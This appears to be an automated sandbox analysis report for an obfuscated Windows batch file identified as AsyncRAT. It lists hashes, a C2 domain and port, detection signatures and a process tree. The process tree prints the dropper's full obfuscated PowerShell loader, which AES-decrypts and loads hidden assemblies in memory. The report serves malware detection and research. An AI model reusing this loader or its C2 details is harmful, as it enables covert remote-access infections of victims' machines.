Analysis

  • max time kernel
    142s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    26-04-2024 01:40

General

  • Target

    fc1c119af2b10c067771cf36170a8b4ac28db714d14cde45a96b4807d654ded5.cmd

  • Size

    82KB

  • MD5

    0b72d9b98a14810527f555cad408e756

  • SHA1

    e24969bea50bebde5905068c993324fae2470ac6

  • SHA256

    fc1c119af2b10c067771cf36170a8b4ac28db714d14cde45a96b4807d654ded5

  • SHA512

    acb4399d53b0b29a23ef04cfae67069a03a115a3da5af22587ba1c47193bc6bad892cdfc90818421658749c68cb90a7dd9436bc507e150dd4db835d7bccf81ce

  • SSDEEP

    1536:oGr7JprjygfWS26G0KbG/9CHHJxPFg2Ta9bt3nliqnOh991geWFY4dAvGyMryXAV:oy77jwS2X0mG/9upxtg2A3nYt1vHGPTV

Score
10/10

Malware Config

Extracted

Family

asyncrat

Botnet

Default

C2

dcxwq1.duckdns.org:3232

Attributes
  • delay

    1

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Async RAT payload 1 IoCs
  • Detects executables attemping to enumerate video devices using WMI 1 IoCs
  • Detects executables containing the string DcRatBy 1 IoCs
  • Detects executables packed with ConfuserEx Mod 1 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\fc1c119af2b10c067771cf36170a8b4ac28db714d14cde45a96b4807d654ded5.cmd"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:652
    • C:\Windows\system32\cmd.exe
      cmd /c \"set __=^&rem\
      2⤵
        PID:4940
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\fc1c119af2b10c067771cf36170a8b4ac28db714d14cde45a96b4807d654ded5.cmd
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3924
        • C:\Windows\system32\cmd.exe
          cmd /c \"set __=^&rem\
          3⤵
            PID:3964
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\fc1c119af2b10c067771cf36170a8b4ac28db714d14cde45a96b4807d654ded5.cmd';$LzXa='RUWTCeaUWTCdLUWTCineUWTCsUWTC'.Replace('UWTC', ''),'ChZJGfangZJGfeExZJGftenZJGfsiZJGfonZJGf'.Replace('ZJGf', ''),'CAhKEreaAhKEteDAhKEeAhKEcAhKErypAhKEtorAhKE'.Replace('AhKE', ''),'FroBWNamBBWNaasBWNae6BWNa4SBWNatrBWNaiBWNangBWNa'.Replace('BWNa', ''),'DWncieWncicomWnciprWnciessWnci'.Replace('Wnci', ''),'TrOZMganOZMgsfoOZMgrmOZMgFinOZMgalOZMgBOZMgloOZMgckOZMg'.Replace('OZMg', ''),'EleFTeEmFTeEeFTeEnFTeEtAtFTeE'.Replace('FTeE', ''),'MMLMhainMLMhMoMLMhduMLMhlMLMheMLMh'.Replace('MLMh', ''),'EnWitytWityrWityyPWityoWityintWity'.Replace('Wity', ''),'CopyJeHyTyJeHoyJeH'.Replace('yJeH', ''),'SplVFEiiVFEitVFEi'.Replace('VFEi', ''),'GetHQKMCuHQKMrHQKMreHQKMntPHQKMrocHQKMeHQKMsHQKMsHQKM'.Replace('HQKM', ''),'IhYurnvohYurkehYur'.Replace('hYur', ''),'LoaEJSmdEJSm'.Replace('EJSm', '');powershell -w hidden;function kTjsA($UARpu){$rvnjY=[System.Security.Cryptography.Aes]::Create();$rvnjY.Mode=[System.Security.Cryptography.CipherMode]::CBC;$rvnjY.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$rvnjY.Key=[System.Convert]::($LzXa[3])('4RFBdW1/zR2QfqFXFvckJggLRbhWPlZ+NeGOFVeQyfc=');$rvnjY.IV=[System.Convert]::($LzXa[3])('/1MUg0yozSO51Z+kagFGTw==');$LixCy=$rvnjY.($LzXa[2])();$eKenk=$LixCy.($LzXa[5])($UARpu,0,$UARpu.Length);$LixCy.Dispose();$rvnjY.Dispose();$eKenk;}function znPjO($UARpu){$WVzHv=New-Object System.IO.MemoryStream(,$UARpu);$OjCYY=New-Object System.IO.MemoryStream;$vQDXk=New-Object System.IO.Compression.GZipStream($WVzHv,[IO.Compression.CompressionMode]::($LzXa[4]));$vQDXk.($LzXa[9])($OjCYY);$vQDXk.Dispose();$WVzHv.Dispose();$OjCYY.Dispose();$OjCYY.ToArray();}$PzMvs=[System.IO.File]::($LzXa[0])([Console]::Title);$pfOyV=znPjO (kTjsA ([Convert]::($LzXa[3])([System.Linq.Enumerable]::($LzXa[6])($PzMvs, 5).Substring(2))));$eOZhb=znPjO (kTjsA ([Convert]::($LzXa[3])([System.Linq.Enumerable]::($LzXa[6])($PzMvs, 6).Substring(2))));[System.Reflection.Assembly]::($LzXa[13])([byte[]]$eOZhb).($LzXa[8]).($LzXa[12])($null,$null);[System.Reflection.Assembly]::($LzXa[13])([byte[]]$pfOyV).($LzXa[8]).($LzXa[12])($null,$null); "
            3⤵
              PID:4604
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              3⤵
              • Blocklisted process makes network request
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:4300
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                4⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:4056
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3760 --field-trial-handle=2252,i,16504368816373493055,9578615028378602855,262144 --variations-seed-version /prefetch:8
          1⤵
            PID:5028

          Network

          MITRE ATT&CK Matrix

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rx4mfyum.psp.ps1
            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          • memory/4056-31-0x00007FFC4E980000-0x00007FFC4F441000-memory.dmp
            Filesize

            10.8MB

          • memory/4056-22-0x00007FFC4E980000-0x00007FFC4F441000-memory.dmp
            Filesize

            10.8MB

          • memory/4056-28-0x00000233EC7A0000-0x00000233EC7B0000-memory.dmp
            Filesize

            64KB

          • memory/4056-26-0x00000233EC7A0000-0x00000233EC7B0000-memory.dmp
            Filesize

            64KB

          • memory/4056-27-0x00000233EC7A0000-0x00000233EC7B0000-memory.dmp
            Filesize

            64KB

          • memory/4300-14-0x000001F765DA0000-0x000001F765DE4000-memory.dmp
            Filesize

            272KB

          • memory/4300-36-0x000001F765D90000-0x000001F765DA6000-memory.dmp
            Filesize

            88KB

          • memory/4300-13-0x000001F764E20000-0x000001F764E30000-memory.dmp
            Filesize

            64KB

          • memory/4300-11-0x000001F764E20000-0x000001F764E30000-memory.dmp
            Filesize

            64KB

          • memory/4300-12-0x000001F764E20000-0x000001F764E30000-memory.dmp
            Filesize

            64KB

          • memory/4300-10-0x00007FFC4E980000-0x00007FFC4F441000-memory.dmp
            Filesize

            10.8MB

          • memory/4300-0-0x000001F764FF0000-0x000001F765012000-memory.dmp
            Filesize

            136KB

          • memory/4300-32-0x000001F765D70000-0x000001F765D82000-memory.dmp
            Filesize

            72KB

          • memory/4300-34-0x00007FFC6CB60000-0x00007FFC6CC1E000-memory.dmp
            Filesize

            760KB

          • memory/4300-15-0x000001F765E70000-0x000001F765EE6000-memory.dmp
            Filesize

            472KB

          • memory/4300-35-0x000001F765D80000-0x000001F765D90000-memory.dmp
            Filesize

            64KB

          • memory/4300-33-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp
            Filesize

            2.0MB

          • memory/4300-37-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp
            Filesize

            2.0MB

          • memory/4300-40-0x00007FFC4E980000-0x00007FFC4F441000-memory.dmp
            Filesize

            10.8MB

          • memory/4300-41-0x00007FFC58E40000-0x00007FFC58E59000-memory.dmp
            Filesize

            100KB

          • memory/4300-44-0x000001F764E20000-0x000001F764E30000-memory.dmp
            Filesize

            64KB

          • memory/4300-43-0x000001F764E20000-0x000001F764E30000-memory.dmp
            Filesize

            64KB

          • memory/4300-45-0x000001F764E20000-0x000001F764E30000-memory.dmp
            Filesize

            64KB

          • memory/4300-46-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp
            Filesize

            2.0MB